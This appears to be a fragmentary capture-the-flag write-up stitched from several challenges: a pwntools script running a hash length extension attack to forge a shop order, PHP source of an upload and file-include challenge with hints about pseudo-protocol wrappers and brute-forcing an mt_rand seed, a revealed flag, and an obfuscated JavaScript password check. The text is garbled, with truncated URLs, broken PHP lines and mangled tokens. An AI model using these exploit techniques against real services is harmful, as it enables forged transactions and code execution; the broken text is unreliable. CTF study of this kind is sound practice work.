from pwn import * import hashpumpy p = remote("",8888)
p.sendline('2') p.sendline('9') timestamp = p.recvuntil("&sign=")[-22:-6]
sign = p.recvuntil("\n") sign = sign[:-1] pr = "product=Flag&price=99999×tamp="+timestamp
for i in range(8,32): ret = hashpumpy.hashpump(sign,pr,"&price=11",i) order = '%s&sign=%s'%(ret[1],ret[0]) temp = p.recv() if "Well" in temp: print "------------------------------>>>>>",temp exit() p.sendline('3') p.recv() p.sendline(str(order))
伪协议查看源码: http:
upload.php <?php error_reporting(0); function show_error_message($message) { die("<div class=\"msg error\" id=\"message\"> <i class=\"fa fa-exclamation-triangle\"></i>$message</div>"); }
function show_message($message) { echo("<div class=\"msg success\" id=\"message\"> <i class=\"fa fa-exclamation-triangle\"></i>$message</div>"); }
function random_str($length = "32") { $set = array("a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F", "g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "l", "L", "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R", "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X", "y", "Y", "z", "Z", "1", "2", "3", "4", "5", "6", "7", "8", "9"); $str = '';
for ($i = 1; $i <= $length; ++$i) { $ch = mt_rand(0, count($set) - 1); $str .= $set[$ch]; } $filename = './uP1O4Ds/' . $str . '_' return $str; } session_start();
$reg='/gif|jpg|jpeg|png/'; if (isset($_POST['submit'])) { $seed = rand(0,999999999); mt_srand($seed); $ss = mt_rand(); $hash = md5(session_id() . $ss); setcookie('SESSI0N', $hash, time() + 3600);
zip: zip: zip:
if ($_FILES["file"]["error"] > 0) { show_error_message("Upload ERROR. Return Code: " . $_FILES["file-upload-field"]["error"]); } $check2 = ((($_FILES["file-upload-field"]["type"] == "image/gif") || ($_FILES["file-upload-field"]["type"] == "image/jpeg") || ($_FILES["file-upload-field"]["type"] == "image/pjpeg") || ($_FILES["file-upload-field"]["type"] == "image/png")) && ($_FILES["file-upload-field"]["size"] < 204800)); $check3=!preg_match($reg,pathinfo($_FILES['file-upload-field']['name'], PATHINFO_EXTENSION));
if ($check3) show_error_message("Nope!"); if ($check2) { $filename = './uP1O4Ds/' . random_str() . '_' . $_FILES['file-upload-field']['name']; if (move_uploaded_file($_FILES['file-upload-field']['tmp_name'], $filename)) { show_message("Upload successfully. File type:" . $_FILES["file-upload-field"]["type"]); } else show_error_message("Something wrong with the upload..."); } else { show_error_message("only allow gif/jpeg/png files smaller than 200kb!"); } } ?>
index.php <?php error_reporting(0);
session_start(); if(isset($_GET['page'])){ $page=$_GET['page']; }else{ $page=null; }
if(preg_match('/\.\./',$page)) { echo "<div class=\"msg error\" id=\"message\"> <i class=\"fa fa-exclamation-triangle\"></i>Attack Detected!</div>"; die(); } ?>
<?php if($page) { if(!(include($page.'.php'))) { echo "<div class=\"msg error\" id=\"message\"> <i class=\"fa fa-exclamation-triangle\"></i>error!</div>"; exit; } } ?>
爆破随机数种子(session_id为我们的 PHPSESSID,hash为SESSI0N) ini_set(‘max_execution_time’, ‘0’);
http: xctf{3fbbe15371c9cd42ec1a698d7660849a} xctf{3fbbe15371c9cd42ec1a698d7660849a} http: CSS flag-Edi98vJF8hnIp.txt index.html index.php js uP1O4Ds upload.php upload.php
function dechiffre(pass_enc){ var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65"; var tab = pass_enc.split(','); var tab2 = pass.split(','); var i,j,k,l=0,m,n,o,p = ""; i = 0; j = tab.length; k = j + (l) + (n=0); n = tab2.length; for(i = (o=0); i < (k = j = n); i++ ) { o = tab[i-l]; p += String.fromCharCode((o = tab2[i])); if(i == 5) break; } for(i = (o=0); i < (k = j = n); i++ ){ o = tab[i-l]; if(i > 5 && i < k-1) p += String.fromCharCode((o = tab2[i])); } p += String.fromCharCode(tab2[17]); pass = p; return pass; } String["fromCharCode"](dechiffre("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30")); 55,56,54,79,115,69,114,116,107,49,50
h = window.prompt('Enter password'); alert( dechiffre(h) );